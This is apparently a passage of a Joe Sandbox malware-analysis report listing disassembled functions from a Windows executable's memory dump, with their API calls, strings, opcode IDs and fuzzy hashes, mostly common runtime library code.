                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo
                                      • String ID: $*
                                      • API String ID: 3215553584-3982473090
                                      • Opcode ID: 9f157a4f6751954bae8bab9751d51363cef21cdc707d610504346d4c75dafc04
                                      • Instruction ID: df99bdd08582007be1b5e8c5a7f989a84d01ddd9e97b3cdfbd56649ee584dd92
                                      • Opcode Fuzzy Hash: 9f157a4f6751954bae8bab9751d51363cef21cdc707d610504346d4c75dafc04
                                      • Instruction Fuzzy Hash: 4A51507290E6478AE7648F34904937C7FA1EF15B8CF1C11B6C64AE2299CF28E481C745
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A3916D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$StringType
                                      • String ID: $%s
                                      • API String ID: 3586891840-3791308623
                                      • Opcode ID: e5e9050dfdaeb3c12b157b48f2e5ef5602bf6f551ba74a9a670d22b2743eb576
                                      • Instruction ID: 6c52d30572873097c0b82b899c7a8ac659df9da5f84ad45ff40660243497ca03
                                      • Opcode Fuzzy Hash: e5e9050dfdaeb3c12b157b48f2e5ef5602bf6f551ba74a9a670d22b2743eb576
                                      • Instruction Fuzzy Hash: 76418F22B19B828AEBA08F65D9006A962D1FF45BACF4C0675DE1DE77D4DF3CE4458300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A386620 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: CreateFrameInfo__except_validate_context_recordabort
                                      • String ID: csm
                                      • API String ID: 2466640111-1018135373
                                      • Opcode ID: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                      • Instruction ID: 7d49fc64d3279e3370d6ff272ff061e2ff4c06740ddbf974aad13cbcee38721a
                                      • Opcode Fuzzy Hash: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                      • Instruction Fuzzy Hash: E5517E7261A74286DA20EB25E44026E77E4FB88B94F580574EB8ED7B55DF3CE450CB00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A3942E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ByteCharErrorFileLastMultiWideWrite
                                      • String ID: U
                                      • API String ID: 2456169464-4171548499
                                      • Opcode ID: d45e585e69c0243794f741c6b44cd1cf0a8545c3e68d7014f3b50cee5fd1175b
                                      • Instruction ID: 46e59318d6a6bb723fca1fe52566262474dd434928150a01fc00dee88c1cca70
                                      • Opcode Fuzzy Hash: d45e585e69c0243794f741c6b44cd1cf0a8545c3e68d7014f3b50cee5fd1175b
                                      • Instruction Fuzzy Hash: F641C322729A8186EB208F25E9453BAB7A0FF98798F484131EE4ED7798DF7CD451C740
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A379030 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ObjectRelease
                                      • String ID:
                                      • API String ID: 1429681911-3916222277
                                      • Opcode ID: 9b4f6076e1c5c019ef354d78af0e0b1b4430159407e758763c369daf3f7713af
                                      • Instruction ID: aefbb6e054c5426cafa18f417f9558eb093f37fdb2f8ef2ea046b8c2eaa75aad
                                      • Opcode Fuzzy Hash: 9b4f6076e1c5c019ef354d78af0e0b1b4430159407e758763c369daf3f7713af
                                      • Instruction Fuzzy Hash: 3C316A36608B5686EB049F17F81862AB7A2FB88FD5F244535ED4B93B54CE3CE049CB00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A36E7EC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                      Download Yara Rule
                                      APIs
                                      • InitializeCriticalSection.KERNEL32(?,?,?,00007FF65A3730FF,?,?,00001000,00007FF65A35E52D), ref: 00007FF65A36E837
                                      • CreateSemaphoreW.KERNEL32(?,?,?,00007FF65A3730FF,?,?,00001000,00007FF65A35E52D), ref: 00007FF65A36E847
                                      • CreateEventW.KERNEL32(?,?,?,00007FF65A3730FF,?,?,00001000,00007FF65A35E52D), ref: 00007FF65A36E860
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Create$CriticalEventInitializeSectionSemaphore
                                      • String ID: Thread pool initialization failed.
                                      • API String ID: 3340455307-2182114853
                                      • Opcode ID: b988014fa09f69f29488cf01db4975baa26b0601a0ec9a12dcfa548a4564653f
                                      • Instruction ID: fb2f58fb02cbc1af5105074e8a96aec65e0fa0f68c46bf96401230986dd9288e
                                      • Opcode Fuzzy Hash: b988014fa09f69f29488cf01db4975baa26b0601a0ec9a12dcfa548a4564653f
                                      • Instruction Fuzzy Hash: 3721D232A196028BF7008F24E4543AD36A2EF88B0CF2C8074CA0CCB295DF7E98598780
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A378560 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: CapsDeviceRelease
                                      • String ID:
                                      • API String ID: 127614599-3916222277
                                      • Opcode ID: a495d1c106870e0f0321fa1e920729909cda6ce65bb071f3320cbe7ab8d646f7
                                      • Instruction ID: ff7611762f9172348f47b94c4c3e0781adf94350d3f9279f6f48ed040ed66234
                                      • Opcode Fuzzy Hash: a495d1c106870e0f0321fa1e920729909cda6ce65bb071f3320cbe7ab8d646f7
                                      • Instruction Fuzzy Hash: 38E0C220B08A4982FB0867BAF58A03A6262AF4CBD0F298135DA1FC7794CE3CC4C94300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A35D1B8 Relevance: 6.2, APIs: 4, Instructions: 238timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$FileTime
                                      • String ID:
                                      • API String ID: 1137671866-0
                                      • Opcode ID: c53ab121de3d823d3d2d07a8a279737889fac9f894679b6fb1544cd3155cc1ac
                                      • Instruction ID: 6df0cbb2503a37e8208bc0b7d004ae0e486751caf632452429bffde8d5d806bd
                                      • Opcode Fuzzy Hash: c53ab121de3d823d3d2d07a8a279737889fac9f894679b6fb1544cd3155cc1ac
                                      • Instruction Fuzzy Hash: A0A1C262A18B8282EA10DF69E8411BD6371FF89788F485171EA5DE7BE9DF3CE544C700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A3704C8 Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ErrorLast
                                      • String ID:
                                      • API String ID: 1452528299-0
                                      • Opcode ID: 33a6d48c7d4cf514ad4a28d2e0d94d3aa7718ec4f35ce7f0dd76267e13dfbac5
                                      • Instruction ID: 62f6f760ed49c4b600c2b71e31846272427f74d497096508fe2c123f97bf0657
                                      • Opcode Fuzzy Hash: 33a6d48c7d4cf514ad4a28d2e0d94d3aa7718ec4f35ce7f0dd76267e13dfbac5
                                      • Instruction Fuzzy Hash: 5351B272F14A4299FB009F68D4452EC2361EF89B9CF5842B6DA5CE779AEE2CD240C340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A379D10 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                      • String ID:
                                      • API String ID: 1077098981-0
                                      • Opcode ID: e26acce420580f6aefe037c87ea2309ce40919c9e77957ec11070d7c0aa8b4a3
                                      • Instruction ID: c6c4820e03e2e1763b34f95846910380cb2554994c6e6778aaa061b86a68179c
                                      • Opcode Fuzzy Hash: e26acce420580f6aefe037c87ea2309ce40919c9e77957ec11070d7c0aa8b4a3
                                      • Instruction Fuzzy Hash: 10515C32A18B42C6EB508F61E4447AEB7A5FF85B88F580175EA4EE7A54DF3CD508CB00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A38DADC Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                      • String ID:
                                      • API String ID: 4141327611-0
                                      • Opcode ID: a98e5aeb67f48d2f6f979bd70fbe768edfa1404fbf159e78b91cdf96afedf3b8
                                      • Instruction ID: 5fa0440dec408ca785d8c1bad9a1090da8134856d0cf23737a4967824c8addaa
                                      • Opcode Fuzzy Hash: a98e5aeb67f48d2f6f979bd70fbe768edfa1404fbf159e78b91cdf96afedf3b8
                                      • Instruction Fuzzy Hash: 3E416071A0A78347FB669A119140379A6A1EF90BE8F1C41B0DA9DE7AD5DF3CE8418710
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A363940 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: FileMove_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3823481717-0
                                      • Opcode ID: 1d0c6643811407c9dfb474fce8de764838b8395fc48ba8205c64bb453e2dae61
                                      • Instruction ID: 72b3e435f5906726ea623b2b27b1a7a6d1420925ffb185f8fa33b18cad11509c
                                      • Opcode Fuzzy Hash: 1d0c6643811407c9dfb474fce8de764838b8395fc48ba8205c64bb453e2dae61
                                      • Instruction Fuzzy Hash: 3F419A62F14A9284FB00CFB9E8851AC2372BF85BACB181275DE5DE7B99DF38D445C240
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A390AF8 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF65A38C3DB), ref: 00007FF65A390B11
                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF65A38C3DB), ref: 00007FF65A390B73
                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF65A38C3DB), ref: 00007FF65A390BAD
                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF65A38C3DB), ref: 00007FF65A390BD7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                      • String ID:
                                      • API String ID: 1557788787-0
                                      • Opcode ID: 57e6a8c8eb3660c1ef58ab29e04114fb274abfae31478a384663a9e2e76f5968
                                      • Instruction ID: d08349b2b3a028e16eca75778ca538a0f84b9ea0b0c560b51b2766e593cf4a9c
                                      • Opcode Fuzzy Hash: 57e6a8c8eb3660c1ef58ab29e04114fb274abfae31478a384663a9e2e76f5968
                                      • Instruction Fuzzy Hash: DF218531F19B5286E6209F16A540029B6A4FF95BD8B0C41B4EE8EF3B98DF3CE4518300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A38D3C0 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ErrorLast$abort
                                      • String ID:
                                      • API String ID: 1447195878-0
                                      • Opcode ID: 66754dd10562acfe9150f83282709bfe11e0b7c2362ae99d4c12b657f2a22dea
                                      • Instruction ID: f7e0c7624ce3764f481e55be7734d94ac4a38ecc1207a6569bf970c5b12f1ee7
                                      • Opcode Fuzzy Hash: 66754dd10562acfe9150f83282709bfe11e0b7c2362ae99d4c12b657f2a22dea
                                      • Instruction Fuzzy Hash: 33017110B0F60346FE587B31A65A57D51925F84BDCF0C04B8D91EE77DAED2CF8458220
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A378510 Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: CapsDevice$Release
                                      • String ID:
                                      • API String ID: 1035833867-0
                                      • Opcode ID: 659ac7cef5a6230f511b131fe25ef100f867fa9a2810ce63495c253f9cdf3390
                                      • Instruction ID: 1b87067c7ce118ea4b8ede050e3d642d5e64f8e525e799a55a0ea463ebb46a6e
                                      • Opcode Fuzzy Hash: 659ac7cef5a6230f511b131fe25ef100f867fa9a2810ce63495c253f9cdf3390
                                      • Instruction Fuzzy Hash: 4FE0ED60E0AA0A82FF186B7AE8591356552AF4874AF1C45B9C81EE6350DD3CE1898610
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A35E35C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 176COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID: DXGIDebug.dll
                                      • API String ID: 3668304517-540382549
                                      • Opcode ID: e2beec6384ee566bb1182c17cdbc28a748d9a345432d069e32ce4d73ae33d0ef
                                      • Instruction ID: afe58027eb99cc4e5e7138f3039652d9bda3d34199f1bc4b932980f2adc11115
                                      • Opcode Fuzzy Hash: e2beec6384ee566bb1182c17cdbc28a748d9a345432d069e32ce4d73ae33d0ef
                                      • Instruction Fuzzy Hash: 5971AC72A14B8186EB24CF65E8403ADB3A5FF58798F184226DFAD97B95DF78D061C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A38E174 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
